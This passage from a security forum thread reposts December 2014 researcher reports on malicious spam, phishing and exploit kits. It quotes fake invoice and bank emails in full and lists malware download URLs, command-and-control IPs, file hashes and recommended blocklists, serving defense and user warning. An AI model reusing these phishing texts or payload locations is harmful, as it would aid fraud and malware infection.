Web users should be on the lookout for this kind of social engineering that capitalizes on fear and misleads users to believe the alert is showing up based on user-defined preferences. Zeus is a dangerous malware that continues to be distributed through sophisticated avenues. In the past, Zeus infections have led to exploitation of machines, making them part of a -botnet-, as well as bank account takeovers and fraud."

:fear::fear: :mad:

AplusWebMaster
2014-12-11, 13:19
FYI...

Fake Invoice 'UK Fuels E-bill' SPAM - malicious doc attachment
- http://blog.dynamoo.com/2014/12/uk-fuels-e-bill-ebillinvoicecom-spam.html
11 Dec 2014 - "This -fake- invoice comes with a malicious attachment:
From: invoices@ ebillinvoice .com
Date: 11 December 2014 at 08:06
Subject: UK Fuels E-bill
Customer No : 35056
Email address : [redacted]
Attached file name : 35056_49_2014.doc
Dear Customer
Please find attached your invoice for Week 49 2014.
In order to open the attached DOC file you will need
the software Microsoft Office Word.
If you have any queries regarding your e-bill you can contact us at invoices@ ebillinvoice .com.
Yours sincerely
Customer Services
UK Fuels Ltd ...

This spam is not from UK Fuels Ltd or ebillinvoice .com and is a forgery. Attached is a malicious Word document which in the sample I have seen is undetected by AV vendors*. This downloads a file from the following location:
http ://KAFILATRAVEL .COM/js/bin.exe
This is downloaded and saved to %TEMP%\LNKCLHSARFL.exe. This binary only has a detection rate of 3/56** at VirusTotal. The Malwr report shows that it POSTs data to 203.172.141.250 (Ministry of Education, Thailand), which has been commonly used in this sort of attack (I strongly recommend that you -block- this IP). It also drops a DLL which is probably Dridex, which has a detection rate of only 1/55***."
* https://www.virustotal.com/en/file/939fb5c4bdfa7a7a5ede2813ec3b4a8ceb17a0247b27f13e9cea590cc6e1bb87/analysis/1418293134/

** https://www.virustotal.com/en/file/9fae183a06c6980b8f6662156612e395e70cf75aa1c266037fcbbd283e9923ad/analysis/1418293637/

*** https://www.virustotal.com/en/file/a35597d4ae580653b5c26f0e739215e63ab39e74a76903357ed1616d096e1962/analysis/1418294506/

- http://myonlinesecurity.co.uk/uk-fuels-e-bill-word-doc-malware/
11 December 2014 : 35056_49_2014.doc (89kb) Current Virus total detections: 0/56*
35056_49_2014.doc (69kb) Current Virus total detections: 0/56**
* https://www.virustotal.com/en/file/939fb5c4bdfa7a7a5ede2813ec3b4a8ceb17a0247b27f13e9cea590cc6e1bb87/analysis/1418285959/

** https://www.virustotal.com/en/file/1e367459dd260c055f3b51cf22d7d8125cfc14b3d3178d6b3cf60850091f4dc7/analysis/1418285875/
___

Fake 'RBS Important Docs' SPAM – doc malware
- http://myonlinesecurity.co.uk/rbs-important-docs-word-doc-malware/
11 Dec 2014 - "'RBS Important Docs' pretending to come from Lenore Hinkle <Lenore@ rbs .co .uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please review attached documents regarding your account.
Tel: 01322 182123
Fax: 01322 011929
email: Lenore@ rbs .co.uk
This information is classified as Confidential unless otherwise stated.

11 December 2014: RBS_Account_Documents.doc (1mb) Current Virus total detections: 1/56*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e1552f04ca253e3910d0b3fa0e96bca3ce43561c2cb53162bad1436b4d5f0de5/analysis/1418306209/
___

REVETON Ransomware spreads ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/reveton-ransomware-spreads-with-old-tactics-new-infection-method/
Dec 11, 2014 - "... Over the past few months spanning October up to the last weeks of November, we observed a noticeable increase in REVETON malware variants, in particular, TROJ_REVETON.SM4 and TROJ_REVETON.SM6... Below is the warning message along with a MoneyPak form to transfer the payment of $300 USD. The message also warns users that they have only 48 hours to pay the fine.
Fake warning messages from Homeland Security and the ICE Cyber Crime Center:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/homeland_ice.png
... the healthcare industry seems to be the most affected industry by this malware and mostly centered in the United States, followed by Australia. Below is a ranking of most affected countries by this new wave of REVETON malware spanning October to November 2014.
Data for TROJ_REVETON.SM4 and TROJ_REVETON.SM6 for October – November 2014:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/reveton-new-infect2.jpg
... It might be jarring for users to suddenly receive a message supposedly sent by law enforcement agencies. However, they need to keep in mind that this is just a tactic intended to “scare” users into paying the fee. Users might also be tempted to pay the ransom to get their computers up and running once again. Unfortunately, there is no guarantee that paying the ransom will result in having the computer screen unlocked. Paying the ransom will only guarantee more money going into the pockets of cybercrooks... Some ransomware variants arrive as attachments of spammed messages. As such, users should be wary of opening emails and attachments, especially those that come from unverified sources. If the email appears to come from a legitimate source (read: banks and other institutions), users should verify the email with the bank. If from a personal contact, -confirm- if they sent the message. Do not rely solely on trust by virtue of relationship, as friends or family members may be victims of spammers as well."
___

Phish: CloudFlare SSL certificate abused
- https://blog.malwarebytes.org/fraud-scam/2014/12/free-ssl-certificate-from-cloudflare-abused-in-phishing-scam/
Dec 11, 2014 - "... received a phishing email pretending to come from LogMeIn, the popular remote administration tool. It uses a classic scare tactic “We were unable to charge your credit card for the due amount.( Merchant message – Insufficient funds )” to trick the user into opening up a
-fake- invoice:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/unphish.png
... What struck our interest here was the fact that this link was https based. It was indeed a secure connection... with a valid certificate:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/certificatechain.png
On September 29, CloudFlare, a CDN and DNS provider amongst other things, announced Universal SSL, a feature available to all its paid and free customers. It is not the first time cyber-criminals are abusing CloudFlare, and this case is not entirely surprising. By giving a false sense of security (the HTTPS padlock), users are more inclined to follow through and download the malicious file.
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/properties.png
... CloudFlare is issuing a warning that the URL is a ‘Suspected phishing site':
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/warning.png
In some regard SSL certifications may become like digitally signed files, where while they do add a level of trust one should still exercise caution and not blindly assume everything is fine. It might be difficult to keep up with each and every new site that wants to abuse the system (cat-and-mouse game)... We can certainly expect cyber criminals to start using SSL more and more given that it is freely available and not extremely difficult to put in place. Another standard known as Extended Validation Certificate SSL (EV SSL) requires additional validation than plain SSL, but again, this does not make things simple for the end user. If regular SSL is deemed weak, then we have a bit of a problem... We have reported this URL to CloudFlare and hope they can revoke the SSL certificate and shutdown the site."

:fear: :mad:

AplusWebMaster
2014-12-12, 19:32
FYI...

Info-Stealing file infector hits US, UK
- http://blog.trendmicro.com/trendlabs-security-intelligence/info-stealing-file-infector-hits-us-uk/
Dec 11, 2014 5:15 pm (UTC-7) - "... there has been a spike in infections related to the malware URSNIF. The URSNIF family is known to steal information such as passwords. Spyware are always considered high risk, but these URSNIF variants can cause damage beyond info-stealing. These URSNIF variants are file-infectors — which is the cause of the noted spike... the countries most affected by the spike are the United States and the United Kingdom. These two countries comprise nearly 75% of all the infections related to these URSNIF variants. Canada and Turkey are the next countries most affected by malware.
Countries affected by URSNIF spike, based on data gathered for December 2014 so far:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/URSNIF-spike.jpg
Additional feedback shows that education, financial, and manufacturing were among the industries affected by this spike... It infects all .PDF, .EXE, and .MSI files found in all removable drives and network drives. URSNIF packs the found files and embeds them to its resource section. When these infected files were executed, it will drop the original file in %User Temp% (~{random}.tmp.pdf, ~{random}.tmp.exe) and then execute it to trick user that the opened file is still fine... After deleting the original .PDF file, it will create an .EXE file using the file name of the original .PDF file. As for .MSI and .EXE files, it will insert its code to the current executable. It will only infect .EXE files with “setup” on its filename.
Difference between an infected (top) and clean (bottom) .PDF file. The infected file is 3.18 MB while the clean file is 2.89 MB:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/URSNIF-spike3.png
For MSI files, it will execute the original file first before executing the malware code. For .PDF and .EXE files, it will produce a dropper-like Trojan, which will drop and execute the original file and the main file infector... The malware family URSNIF is more known as spyware. Variants can monitor network traffic by hooking network APIs related to top browsers such as Internet Explorer, Google Chrome, and Mozilla Firefox. It is also known for gathering information. However, the fact that a family known for spyware now includes file infectors shows that cybercriminals are not above tweaking established malware to expand its routines... A different file infector type (e.g., appending) requires a different detection for security solutions; not all solutions may have this detection. Another notable feature for this particular malware is that it starts its infection routine 30 minutes after its execution... variants often arrive via spammed messages and Trojan dropper/downloader malware. Users need a comprehensive security solution that goes beyond detecting and blocking malware. Features like email reputation services which can detect and block spam and other email-related threats can greatly boost a computer’s security... infected .PDF and .EXE files as PE_URSNIF.A2. Infected .MSI files are detected as PE_URSNIF.A1.
Hash of the related file:
dd7d3b9ea965af9be6995e823ed863be5f3660e5
44B7A1555D6EF109555CCE88F2A954CAFE56B0B4
EFC5C6DCDFC189742A08B25D8842074C16D44951
FD3EB9A01B209572F903981675F9CF9402181CA1 "
___

Fake 'Order' SPAM - malicious attachment
- http://blog.dynamoo.com/2014/12/wavecablecom-order-r58551-spam.html
12 Dec 2014 - "This -fake- invoice comes with a malicious attachment.
From: kaybd2@ wavecable .com
Date: 12 December 2014 at 17:17
Subject: Order - R58551
Thanks for placing order with us today! Your order is now on process.
Outright Purchase: 6949 US Dollars
Please click the word file provided below to see more details about your order.
BILLING DETAILS
Order Number: ZJW139855932
Purchase Date: 13.07 11.12.2014
Customer Email: info@ [redacted]

Attached is a malicious Word document INVOICE_7794.DOC which has a detection rate of 4/56* on VirusTotal... macro downloads an executable from:
http ://www.2fs. com .au/tmp/rkn.exe
That has a VirusTotal detection rate of 5/55**... A malicious DLL is dropped onto the system with a VirusTotal detection rate of 2/56***. The only detections are generic, but similar dropped DLLs have been the Dridex banking trojan.
Recommended blocklist:
209.208.62.36
5.187.1.78
46.250.6.1
5.135.28.106
66.213.111.72
95.211.188.129 "
* https://www.virustotal.com/en/file/902aa90dd61f1a89a547726ff06555285463c826d1af673ebdcc148c2200b229/analysis/1418406000/

** https://www.virustotal.com/en/file/90fca160a837f62fdcff2fc3d0a849498a3485c39c7c42a12dc959f5e5db0e56/analysis/1418406121/

*** https://www.virustotal.com/en/file/b13eb856439baf196084f6fc47825d9c677199f71724f351cdd193e30e2618c4/analysis/1418408045/
___

Spammers Accelerate Dyre Distribution
- http://www.threattracksecurity.com/it-blog/dyre-spam/
Dec 12, 2014 - "... Over the last few weeks, the cybercriminals behind Dyre have continued to refine their delivery tactics, and the Trojan is now capable of helping to spread itself and other malware. Our researchers have observed that systems infected with Dyre are not only at risk of the malware stealing log-in credentials, but it may also receive commands to download and install additional spammers – including the Cutwail/Pushdo botnet – to more broadly propagate Dyre. Pushdo is responsible for a large portion of Upatre spam, and the botnet is actively distributing Dyre and other malware, including the data-encrypting ransomware CryptoWall... The bad guys are pulling out all the stops when it comes to distributing their malicious spam. Everything from fraudulent PayPal security alerts to a Top Gun-inspired tale about a Norwegian fighter pilot crossing paths with a Russian MiG to a fake survey purporting to ask recipients their opinions on the controversial events in Ferguson, Missouri, have all been employed to trick recipients into clicking links and opening infected attachments. We recently observed Dyre downloading three spammers. The first, is Pushdo, which runs its own spammer modules. The second and third are a standalone spammers, one of which hijacks the victim’s Microsoft Outlook application to send personal emails with attachments harboring Upatre. The third spammer (see images and email text below from a small sampling) is generating a separate campaign and is increasing in frequency over the last several weeks. All this signals that Dyre is poised to become a more pervasive threat and increasingly active in malicious spam campaigns.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2014/12/CNN-Norwegian-Russian-MiG-Spam.png
(Multiple other SPAM samples shown at the threattracksecurity URL at the top of this post.)
...Ensure your antivirus and endpoint security is up-to-date, and deploy a robust email security solution to protect your organization from malicious spam. IT admins should continue to educate their users about email-borne threats and stress that despite them being at work, they shouldn’t click links and open attachments without regard for security... Consumers should -always- be cautious about what they click, and if there is any doubt about a warning, special offer or request for private information, contact the bank, retailer or service provider directly by -phone- to confirm."
___

Wire transfer spam spreads Upatre
- http://blogs.technet.com/b/mmpc/archive/2014/12/11/wire-transfer-spam-spreads-upatre.aspx
11 Dec 2014 - "... currently monitoring a spam email campaign that is using a wire transfer claim to spread Trojan:Win32/Upatre. It is important to note that customers running up-to-date Microsoft security software are protected from this threat..."

:fear::fear: :mad:

AplusWebMaster
2014-12-15, 17:17
FYI...

Fake 'Payment Advice' SPAM - malicious doc attached
- http://blog.dynamoo.com/2014/12/malware-spam-ifs-applications.html
15 Dec 2014 - "This -fake- payment advice spam is not from Vitacress but is a -forgery- with a malicious Word document attached.
From: IFS Applications [Do_Not_Reply@ vitacress .co.uk]
Date: 15 December 2014 at 07:49
Subject: DOC-file for report is ready
The DOC-file for report Payment Advice is ready and is attached in this mail.

Attached is a file Payment Advice_593016.doc which is actually one of two different documents with zero detections at VirusTotal [1] [2] and contain one of two malicious macros... that download a malware binary from one of the following locations:
http ://gv-roth .de/js/bin.exe
http ://notaxcig .com/js/bin.exe
This file is saved as %TEMP%\DYIATHUQLCW.exe and is currently has a VirusTotal detection rate of just 1/52*. The ThreatExpert report and Malwr report shows attempted connections to the following IPs which have been used in many recent attacks and should be -blocked- if you can:
203.172.141.250 (Ministry of Education, Thailand)
74.208.11.204 (1&1, US)
The malware almost definitely drops the Dridex trojan onto the target system, but I have not been able to get a sample of this yet."
1] https://www.virustotal.com/en/file/d61aa6195a2da022d16af3694050b51e29bc7ef7a6f3ad735c3a20f81891b601/analysis/1418633977/

2] https://www.virustotal.com/en/file/b988ba06d6898fda8b4513be69fd7a2a4f6fe2354ce8e89bfc0db1a25c5b34fe/analysis/1418633990/

* https://www.virustotal.com/en/file/5379e5176d554ab5d66cabfec28b107c104aa3d4e200dcd44baf898771f61d97/analysis/1418634587/

>> http://myonlinesecurity.co.uk/ifs-applications-doc-file-report-ready-word-doc-malware/
15 Dec 2014
1] https://www.virustotal.com/en/file/b988ba06d6898fda8b4513be69fd7a2a4f6fe2354ce8e89bfc0db1a25c5b34fe/analysis/1418628093/

2] https://www.virustotal.com/en/file/d61aa6195a2da022d16af3694050b51e29bc7ef7a6f3ad735c3a20f81891b601/analysis/1418628835/

- http://blog.mxlab.eu/2014/12/15/email-doc-file-for-report-is-ready-contains-malicious-word-macro-file-that-downloads-trojan/
Dec 15, 2014
> https://www.virustotal.com/en/file/5379e5176d554ab5d66cabfec28b107c104aa3d4e200dcd44baf898771f61d97/analysis/
... Behavioural information
TCP connections
74.208.11.204: https://www.virustotal.com/en/ip-address/74.208.11.204/information/
___

GoDaddy 'Account Notice' - Phish ...
- http://www.hoax-slayer.com/godaddy-account-error-phishing-scam.shtml
Dec 15, 2014 - "Email purporting to be from web hosting company GoDaddy claims that your account may pose a potential performance risk to the server because it contains 'too many directories'... The email is -not- from GoDaddy. It is a phishing scam designed to steal your GoDaddy login details. A link in the message takes you to a -fake- Go Daddy login page...
Example:
Subject: Account Notice : Error # 7962
Dear Valued GoDaddy Customer: Brett Christensen
Your account contains more than 3331 directories and may pose a potential performance risk to the server.
Please reduce the number of directories for your account to prevent possible account deactivation.
In order to prevent your account from being locked out we recommend that you create special TMP directory.
Or use the link below :
[Link Removed]
Sincerely,
GoDaddy Customer Support...

... criminals responsible for this phishing attack can use the stolen login details to hijack the victims' GoDaddy account. Once they have gained access to the account, the criminals can take control of the victim's website and email addresses and use them to perpetrate, spam, scam, and malware attacks. Always login to your online accounts by entering the web address into your browser's address bar rather than by clicking-a-link in an email."

:fear: :mad:

AplusWebMaster
2014-12-16, 17:09
FYI...

Fake 'eFax Drive' SPAM - malicious ZIP
- http://blog.mxlab.eu/2014/12/16/url-in-fake-email-from-efax-drive-youve-received-a-new-fax-leads-to-malicious-zip-archive/
Dec 16, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “You’ve received a new fax”. This email is sent from the -spoofed- address and has the following body:
New fax at SCAN9106970 from EPSON by https ://******* .com
Scan date: Tue, 16 Dec 2014 13:17:59 +0000
Number of pages: 2
Resolution: 400×400 DPI
You can secure download your fax message at:
hxxp: //nm2b .org/bhnjhkkgvq/ufqielyyva.html
(eFax Drive is a file hosting service operated by J2, Inc.)

The downloaded file document7241_pdf.zip contains the 33 kB large file document7241_pdf.scr. The trojan is known as Packed.Win32.Katusha.1!O or Malware.QVM20.Gen. At the time of writing, 2 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/d8b1d64ae49b437df163061af11c8f0f0e5dad338c37cfedd4e6f30e37f6499c/analysis/

nm2b .org: 173.254.28.126: https://www.virustotal.com/en/ip-address/173.254.28.126/information/
___

Fake 'Bank account frozen' SPAM - doc malware
- http://myonlinesecurity.co.uk/bank-account-frozen-notice-note-attention-fake-word-doc-malware/
16 Dec 2014 - "'Bank account frozen notice, note, attention. Attention #CITI-44175PI-77527' with a cab attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
This is an automatically generated email. Please do not reply as the email address is not monitored for received mail.
Notification Number: 8489465
Mandate Number: 6782144
Date: December 16, 2014. 01:13pm
In an effort to protect your Banking account, we have frozen your account until such time that it can be safely restored by you. Please view attached file “CITI-44175PI-77527.cab” for details.
Yours truly,
Kathy Schuler ...

16 December 2014: CITI-44175PI-77527.cab : Extracts to: CITI-44175PI-77527.scr
Current Virus total detections: 3/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word.doc file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d0699621c07f92b81d0b7eef250ae15830c10034b8f1b04a07e0fb43cbcfea54/analysis/1418745402/
___

Wells Fargo Secure Meessage Spam
http://threattrack.tumblr.com/post/105365947973/wells-fargo-secure-meessage-spam
Dec 16, 2014 - "Subjects Seen:
You have a new Secure Message
Typical e-mail details:
You have received a secure message
Read your secure message by download document-75039.pdf. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
In order to view the secure message please download it using our Cloud Hosting:
nexpider .com/sawdnilhvi/ckyilmmoca.html

Malicious URLs:
nexpider .com/sawdnilhvi/ckyilmmoca.html
Malicious File Name and MD5:
document82714.scr (98FE8CAD93B6FCDE63421676534BCC57)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8dec4c587c25e211bdabdb5bb92d35e4/tumblr_inline_ngostrpvc41r6pupn.png

Tagged: Upatre, Wells Fargo
____

Trawling for Phish
- https://blog.malwarebytes.org/online-security/2014/12/trawling-for-phish/
Dec 16, 2014 - "... avoid on your travels, whether you’re sent a link to them directly or see the URLs linked in an email. First up, a page located at:
secure-dropboxfile (dot)hotvideostube(dot)net/secure-files-dropbox/document/
It claims to offer a shared Dropbox document in return for entering your email credentials. It follows the well-worn pattern of offering multiple login options for different types of email account, including Gmail, AOL, Windows Live, Yahoo and “other”:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/dboxprn1.jpg
The website itself has a poor reputation on Web of Trust, has been listed as being compromised on defacement archives and was also hosting a banking phish not so long ago. Should visitors attempt to login, it sends them to a shared Google Document (no Dropbox files on offer here) which is actually a “public prayer request” spreadsheet belonging to a Church:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/dboxprn3.jpg
The next page is Google Drive themed and located at:
yellowpagesexpress (dot)com/cgi-bin/Secure Management/index(dot)php
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/dboxprn2.jpg
As before, it asks the visitor to login with the widest possible range of common email accounts available, before sending those who enter their details to an entirely unrelated Saatchi Art investment webpage. Readers should always be cautious around pages claiming to offer up files in return for email logins – it’s one of the most common tactics for harvesting password credentials."

:fear: :mad:

AplusWebMaster
2014-12-17, 14:31
FYI...

Fake 'PL REMITTANCE' malware SPAM
- http://blog.dynamoo.com/2014/12/pl-remittance-details-ref844127rh.html
17 Dec 2014 - "This -fake- remittance advice comes with a malicious Excel attachment.
From: Briana
Date: 17 December 2014 at 08:42
Subject: PL REMITTANCE DETAILS ref844127RH
The attached remittance details the payment of £664.89 made on 16-DEC-2014 by BACSE.
This email was generated using PL Payment Remittance of Integra Finance System.
Can you please check that your supplier details are correct, if any changes are required please email back to this email address quoting your remittance reference.

The reference in the subject and the name of the Excel attachment differ from email to email, but are always consistent in the same message. There are two poorly detected malicious Excel files that I have seen [1] [2] containing two slightly different macros.. which then reach out to the following download locations:
http ://23.226.229.112:8080/stat/lldv.php
http ://38.96.175.139:8080/stat/lldv.php
The file from these locations is downloaded as test.exe and is then saved to %TEMP%\VMHKWKMKEUQ.exe. This has a VirusTotal detection rate of 1/55*. The ThreatTrack report shows it POSTing to the following IP:
194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
This IP has been used in several recent attacks and I strongly recommend blocking it. The Malwr report also shows it dropping a malicious DLL identified as Dridex. The ThreatExpert report gives some different IPs being contacted:
80.237.255.196 (Denes Balazs / HostEurope, Germany)
85.25.20.107 (PlusServer, Germany)
The Ukrainian IP is definitely malicious, but if you wanted to establish maximum protection then I would recommend the following blocklist:
194.146.136.1
80.237.255.196
85.25.20.107
23.226.229.112
38.96.175.139 "
1] https://www.virustotal.com/en/file/3f6d780eee13390c19d15d309a85f512091bc469350023b075a7b5b88ceddc4d/analysis/1418810946/

2] https://www.virustotal.com/en/file/e6017c6355af0aed24b70b62c8684842f715600e75df4b279c8653f428b6cae3/analysis/1418810941/

* https://www.virustotal.com/en/file/a1699fdddc2ffcfdc55b71861b7851719cb277a655053403b1a6fec0c895a264/analysis/1418810686/

> http://blog.mxlab.eu/2014/12/17/new-fake-email-pl-remittance-details-ref1790232eg-with-malcious-xls-in-the-wild/
Dec 17, 2014
Screenshot of the XLS: http://img.blog.mxlab.eu/2014/20141205_remittance_01.gif
- https://www.virustotal.com/en/file/e6017c6355af0aed24b70b62c8684842f715600e75df4b279c8653f428b6cae3/analysis/

> http://myonlinesecurity.co.uk/integra-finance-system-pl-remittance-details-ref6029413oh-excel-xls-malware/
17 Dec 2014
- https://www.virustotal.com/en/file/e6017c6355af0aed24b70b62c8684842f715600e75df4b279c8653f428b6cae3/analysis/1418816542/

> https://www.virustotal.com/en/file/3f6d780eee13390c19d15d309a85f512091bc469350023b075a7b5b88ceddc4d/analysis/1418817871/
___

Fake 'Blocked ACH Transfer' SPAM - malicious DOC attachment
- http://blog.dynamoo.com/2014/12/blocked-ach-transfer-spam-has-malicious.html
17 DEC 2014 - "Another spam run pushing a malicious Word attachment..
Date: 17 December 2014 at 07:27
Subject: Blocked ACH Transfer
The ACH transaction (ID: 618003565), recently sent from your online banking account, was rejected by the Electronic Payments Association.
Canceled transaction
ACH file Case ID 623742
Total Amount 2644.93 USD
Sender e-mail info@mobilegazette.com
Reason for rejection See attached word file
Please see the document provided below to have more details about this issue...
Screenshot: https://2.bp.blogspot.com/-HHVnC18smUE/VJGXBjF2VVI/AAAAAAAAF-o/yzQZ2etQFYk/s1600/ach.png

Attached is a file ACH transaction 3360.doc which isn't actually a Word 97-2003 document at all, but a malicious Word 2007 document that would normally have a .DOCX extension (which is basically a ZIP file). The current VirusTotal detection rate of this is just 1/55*. Inside this is a malicious macro... which downloads a file from:
http ://www.lynxtech .com.hk/images/tn.exe
This has a VirusTotal detection rate of just 1/54**. The Malwr report shows it POSTING to 5.187.1.78 (Fornex Hosting, Germany) and also a query to 209.208.62.36 (Atlantic.net, US). Presumably this then drops additional components onto the infected system, although I do not know what they are.
Recommended blocklist:
5.187.1.78
209.208.62.36 "
* https://www.virustotal.com/en/file/61b8edb31972b04fd2652278cca4431f498ed7930833848233da057ebf842660/analysis/1418826644/

** https://www.virustotal.com/en/file/1269bc3080617da54bdf74b04073c273109545643159883147f141742eb9fc75/analysis/1418826840/
___

Exploit Kits in 2014
- http://blog.trendmicro.com/trendlabs-security-intelligence/whats-new-in-exploit-kits-in-2014/
Dec 17, 2014 - "... Exploits targeting Internet Explorer, Silverlight, and Adobe Flash vulnerabilities were frequently used by exploit kits in the past year. The four vulnerabilities below were some of the most frequently targeted by exploit kits:
CVE-2013-0074 (Silverlight)
CVE-2014-0515 (Adobe Flash)
CVE-2014-0569 (Adobe Flash)
CVE-2014-2551 (Internet Explorer)
The most notable change in this list is the relative absence of Java vulnerabilities. Exploit kits have been removing Java because of the increasing use of click-to-play for Java applets, rendering Java a far less attractive target for exploits. The tables below shows which exploits are in use by exploit kits:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/exploit-kit-usage.png
Plugin Detection: Almost all exploit kits run some sort of software that detect the browser platform a would-be victim is running in order to determine which exploit to send to the user.
The code necessary to do this varies from one exploit kit to another, and is actually fairly complex due to the number of permutations of browsers and plugins that are possible.
Two exploit kits – Nuclear and FlashPack – use a legitimate JavaScript library, PluginDetect. This minimizes the work the creators of the exploit kit need to do, as well as providing a complete set of features. However, this also means that this library has known characteristics: this makes it more visible to security vendors looking for sites used by exploit kits. By contrast, most exploit kits write their own library to perform this task. This makes detection harder, but it also reduces the capabilities of the libraries. Many of these libraries, for example, will only function under Internet Explorer. The Magnitude exploit kit uses a third method – server-side code – too. The following table summarizes which libraries are used.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/exploit-kit-detect-b.png
Antivirus Detection: A new feature that has been added to exploit kits is the ability to detect installed security software. If certain specific security products are installed, the exploit kit will stop itself from running. Both antivirus products and virtual machine software can be targeted in this manner. This behavior is possible due to a vulnerability in Internet Explorer (CVE-2013-7331). This vulnerability allows an attacker to check for the presence of files and folders on an affected system. It was first reported to Microsoft in February 2014, but was only patched in September of the same year as part of MS14-052. The following table summarizes the products that each exploit kit detects:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/exploit-kit-software.png
Obfuscation Techniques: Exploit kits regularly use various techniques to obfuscate their activity, but some exploit kits have added new techniques. In both of these cases, the attackers are using legitimate tools to obfuscate their files. The Angler exploit kit now uses the Pack200 format to help avoid detection. Pack200 is a compactive archive format that was developed by Sun (Java’s original developers) to compress .JAR files significantly. Tools to uncompress these files are provided as part of the Java development kit, but many security products don’t support these formats (so they are unable to scan the said malicious file)...
Summary: Exploit kit developers have not been idle in the year since the collapse of the Blackhole exploit kit. They have made various improvements that help improve the capabilities of these tools. The defenses against these tools on the part of users remains the same. We highly recommend that users implement all updates to their software as is practical, since many of the vulnerabilities targeted by attackers have long been fixed by software vendors."
___

Dyre Banking Trojan - Secureworks
- http://www.secureworks.com/cyber-threat-intelligence/threats/dyre-banking-trojan/
Dec 17 2014

:mad: :fear::fear:

AplusWebMaster
2014-12-18, 14:57
FYI...

More than 100,000 'WordPress sites infected with Malware'
- https://www.sans.org/newsletters/newsbites/xvi/99#301
Dec 15, 2014 - "More than 100,000 websites running on WordPress content management system have been found to be infected with malware that attacks the devices of site visitors. Google has blacklisted more than 11,000 domains. Reports suggest that the attackers exploited a vulnerability in the Slider Revolution Premium plug-in*, which the company has known about since September 2014..."
> http://arstechnica.com/security/2014/12/some-100000-or-more-wordpress-sites-infected-by-mysterious-malware/
Dec 15, 2014
(More links at the sans URL above.)

* http://blog.sucuri.net/2014/12/soaksoak-malware-compromises-100000-wordpress-websites.html
Dec 14, 2014
___

Fake 'AquAid Card' SPAM – doc malware
- http://myonlinesecurity.co.uk/tracey-smith-aquaid-card-receipt-word-doc-malware/
18 Dec 2014 - "'AquAid Card Receipt' pretending to come from Tracey Smith <tracey.smith@aquaid.co.uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer... This email has what appears to be a genuine word doc attached which is malformed and contains a macro script virus. Modern versions of Microsoft office, that is Office 2010 and 2013 and Office 365 have Macros disabled by default, UNLESS you or your company have enabled them. If protected view mode is turned off and macros are enabled then opening this malicious word document will infect you, and simply previewing it in windows explorer or your email client might well be enough to infect you. Definitely DO -NOT- follow the advice they give to enable macros to see the content... The email looks like:
Hi
Please find attached receipt of payment made to us today
Tracey
Tracey Smith| Branch Administrator
AquAid | Birmingham & Midlands Central
Unit 35 Kelvin Way Trading Estate | West Bromwich | B70 7TP ...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/Card-Receipt-Aquaid-malicious-email.jpg

The macros in this malicious word doc try to connect to http ://sardiniarealestate .info/js/bin.exe ..which is saved as %TEMP%\YEWZMJFAHIB.exe – this has a marginally better detection rate of 3/53*. As we have seen in so many recent attacks like this one, there are 2 versions of the malware:
18 December 2014 : CAR014 151239.doc ( 124kb) | Current Virus total detections: 2/56**
CAR014 151239.doc (130 kb) | Current Virus total detections: 2/55***
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it. Now that is very easy to say but quite hard to put into practice, because we all get emails with files attached to them..."
* https://www.virustotal.com/en/file/b73b4a11f725137a4e1aa19236a5b61671d0880edc8ba1c4d7dd22031e55a922/analysis/1418893740/

** https://www.virustotal.com/en/file/c3b99aa07e32acf3411a46dc484fbb6f9327398e207fbd1595a964084bb8a375/analysis/1418891360/

*** https://www.virustotal.com/en/file/048714ed23c86a32f085cc0a4759875219bdcb0eb61dabb2ba03de09311a1827/analysis/1418891888/


> http://blog.dynamoo.com/2014/12/malware-spam-aquaidcouk-card-receipt.html
18 Dec 2014
- https://www.virustotal.com/en/file/c3b99aa07e32acf3411a46dc484fbb6f9327398e207fbd1595a964084bb8a375/analysis/1418893415/
... Recommended blocklist:
74.208.11.204
81.169.156.5 "
___

Fake 'Internet Fax' SPAM - trojan Upatre.FH
- http://blog.mxlab.eu/2014/12/18/email-internet-fax-job-contains-url-that-downloads-trojan-upatre-fh/
Dec 18, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Internet Fax Job”, the email is sent from the spoofed address “MyFax <no-replay@ my-fax.com>” and has the following body:
Fax image data
